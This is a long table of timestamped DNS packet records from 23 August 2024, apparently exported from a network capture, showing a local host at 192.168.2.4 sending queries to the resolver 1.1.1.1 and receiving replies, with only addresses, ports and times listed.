                                                                                                                                                                                                              Aug 23, 2024 18:47:15.563935041 CEST5137353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.574069977 CEST53513731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.782815933 CEST53549841.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:15.843209982 CEST5677553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:16.496458054 CEST53567751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.808643103 CEST6353953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.833857059 CEST5314353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.836477041 CEST5000353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.854923010 CEST53635391.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.885438919 CEST53531431.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:36.893754005 CEST53500031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.000771046 CEST6470553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.004936934 CEST6528553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.012491941 CEST5443153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.019927979 CEST5029353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.023184061 CEST5254353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.026655912 CEST5732053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.031167984 CEST6170053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.038492918 CEST53647051.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.038714886 CEST5337953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.042779922 CEST53544311.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.045559883 CEST6179353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.053014994 CEST53502931.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.057693005 CEST53525431.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.058971882 CEST53652851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.059571981 CEST5348753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060077906 CEST5085153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060336113 CEST6334553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060741901 CEST5869953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.060915947 CEST6019153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.067194939 CEST53533791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.073044062 CEST53617931.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.079309940 CEST53573201.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.084222078 CEST53617001.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.084235907 CEST53508511.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.086267948 CEST53586991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.104377985 CEST6496153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.108556032 CEST5287653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.108760118 CEST6459653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.108916044 CEST6448253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.109421015 CEST6540153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.111695051 CEST53633451.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.112606049 CEST53534871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.112617970 CEST53601911.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.124967098 CEST6311653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.125277996 CEST6395253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.131519079 CEST53649611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.152654886 CEST53644821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.156604052 CEST53645961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.156615973 CEST53528761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.170241117 CEST53639521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.173518896 CEST53631161.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187253952 CEST5793853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187491894 CEST6325553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187745094 CEST5316653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.187889099 CEST6175653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.188288927 CEST6157553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.188438892 CEST6362253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.188750982 CEST6508253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189007044 CEST5849453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189224005 CEST5911053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189615965 CEST6446553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.189893961 CEST5455553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.191452026 CEST5360453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.191848040 CEST5234253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.192034960 CEST5205753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.192424059 CEST5769253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.192869902 CEST5093053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.193074942 CEST6197753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.221111059 CEST6353453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.221991062 CEST5956453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.222311974 CEST6431453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.222528934 CEST6198953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.223839998 CEST6348853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224143982 CEST5561853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224522114 CEST5961453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224689007 CEST5352353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.224859953 CEST5335253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.225245953 CEST5787753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.225471973 CEST4967953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.225682020 CEST5732553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.228699923 CEST53579381.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.228809118 CEST53531661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.228820086 CEST53650821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.230321884 CEST53509301.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.230334997 CEST53520571.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.230345011 CEST53545551.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.230355024 CEST53617561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.230372906 CEST53576921.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.241229057 CEST53523421.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.252109051 CEST53584941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.252830029 CEST53644651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.252842903 CEST53619771.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.254162073 CEST53536041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.259603024 CEST53595641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.259614944 CEST53643141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.259624958 CEST53634881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.271140099 CEST53535231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.271632910 CEST53556181.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.271647930 CEST53573251.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.273103952 CEST53578771.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.276566029 CEST5242153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.276770115 CEST5458453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.276941061 CEST5186253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.277412891 CEST5926553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.279663086 CEST6091253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.282016039 CEST5890353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283670902 CEST6531153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283701897 CEST6111153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283900023 CEST5791453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.283932924 CEST6420653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.284089088 CEST6500053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.291471958 CEST53619891.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.291485071 CEST53635341.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.291493893 CEST53596141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.296873093 CEST53533521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.296885967 CEST53496791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.308409929 CEST53592651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.311341047 CEST53609121.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.316302061 CEST53642061.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.319160938 CEST5806253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.319241047 CEST53611111.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.330874920 CEST53518621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.330888033 CEST53545841.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.330895901 CEST53589031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.333854914 CEST53653111.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.336671114 CEST53579141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.373155117 CEST53636221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.377871037 CEST53615751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.409786940 CEST53591101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.444397926 CEST53524211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.455167055 CEST53580621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.456842899 CEST53654011.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.543504000 CEST5196453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.566437006 CEST53519641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.612678051 CEST53650001.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.679685116 CEST5156053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.687506914 CEST5049153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.700576067 CEST5698553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:37.719563961 CEST53569851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.017304897 CEST53515601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.087523937 CEST53504911.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.191203117 CEST6325553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.287389040 CEST53632551.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.291616917 CEST53632551.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.396585941 CEST5090253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.435899973 CEST6071753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.466334105 CEST53607171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.718096972 CEST6141753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:38.734062910 CEST53509021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.237541914 CEST53614171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.927797079 CEST5549153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.928783894 CEST5027253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.929482937 CEST6221153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.930449009 CEST5793253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.931091070 CEST6484053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.932106018 CEST5754053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.932811975 CEST6191153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.933449030 CEST5172153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.933892012 CEST5784553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.934165955 CEST5121453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.934484005 CEST5609953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.934928894 CEST5146853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.935065985 CEST6384053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.935616016 CEST5530153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.935616016 CEST6228653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936150074 CEST6356153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936448097 CEST6118353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936556101 CEST5530453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936959028 CEST6505653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.936980963 CEST4936853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.937561989 CEST5865253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.937653065 CEST5804753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938122034 CEST5876053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938429117 CEST6348453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938456059 CEST6324853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.938992023 CEST5931753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.939346075 CEST5582753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.939557076 CEST6367653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.942476034 CEST5321853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.944300890 CEST5273953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.944571018 CEST5995753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.944725037 CEST5673453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945008039 CEST5499253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945166111 CEST5312453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945319891 CEST4989853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945471048 CEST6538553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945636988 CEST5090453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945774078 CEST5449753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.945954084 CEST5878553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946342945 CEST5399853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946511030 CEST6305953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946679115 CEST5257953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946830034 CEST5633253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.946990967 CEST5399353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.947978020 CEST6339853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.948793888 CEST5200253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.948828936 CEST5548253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949029922 CEST5945353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949052095 CEST6003853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949218035 CEST6118453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949254036 CEST5743353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949395895 CEST5044753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949456930 CEST5218953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949573040 CEST4944653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949636936 CEST5120653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949748039 CEST6490053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949820995 CEST5516453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.949911118 CEST5692553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.950181007 CEST6483053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.950669050 CEST6183253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.950850010 CEST6029353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.951057911 CEST6502653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.951260090 CEST6338753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.951673985 CEST5884653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.970561981 CEST53554911.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.972032070 CEST53502721.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.972044945 CEST53622111.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.974685907 CEST53648401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.974699020 CEST53578451.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.974709988 CEST53512141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.974720955 CEST53638401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.974730968 CEST53517211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.974740982 CEST53619111.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.976212978 CEST53514681.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.980855942 CEST53611831.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.980927944 CEST53634841.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.980938911 CEST53532181.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.981964111 CEST53653851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.981975079 CEST53632481.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.981985092 CEST53563321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.981996059 CEST53509041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.982006073 CEST53531241.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.982014894 CEST53558271.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.982024908 CEST53544971.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.982034922 CEST53593171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984158039 CEST53553041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984169006 CEST53586521.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984179020 CEST53520021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984188080 CEST53567341.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984208107 CEST53554821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984220028 CEST53594531.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984229088 CEST53579321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984240055 CEST53574331.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984247923 CEST53494461.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984257936 CEST53539931.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984266996 CEST53611841.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984280109 CEST53512061.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984288931 CEST53493681.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984298944 CEST53551641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.984308004 CEST53650261.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.988687038 CEST53569251.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.990586042 CEST53633871.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.990598917 CEST53575401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.996793032 CEST53622861.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.997307062 CEST53560991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:39.997318029 CEST53635611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.000474930 CEST53553011.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.008990049 CEST53587851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.009103060 CEST53498981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.009114027 CEST53630591.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012413979 CEST53636761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012427092 CEST53633981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012438059 CEST53525791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012447119 CEST53580471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012458086 CEST53600381.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012765884 CEST53649001.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012778044 CEST53504471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012787104 CEST53588461.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012797117 CEST53521891.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012806892 CEST53618321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.012816906 CEST53602931.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.015851021 CEST53587601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.015866041 CEST53527391.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.015876055 CEST53599571.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.015886068 CEST53549921.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.019756079 CEST53648301.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.127703905 CEST53650561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.148049116 CEST53539981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.155694008 CEST5649853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.156353951 CEST6379653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.165714025 CEST4964453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:40.167004108 CEST5696753192.168.2.41.1.1.1
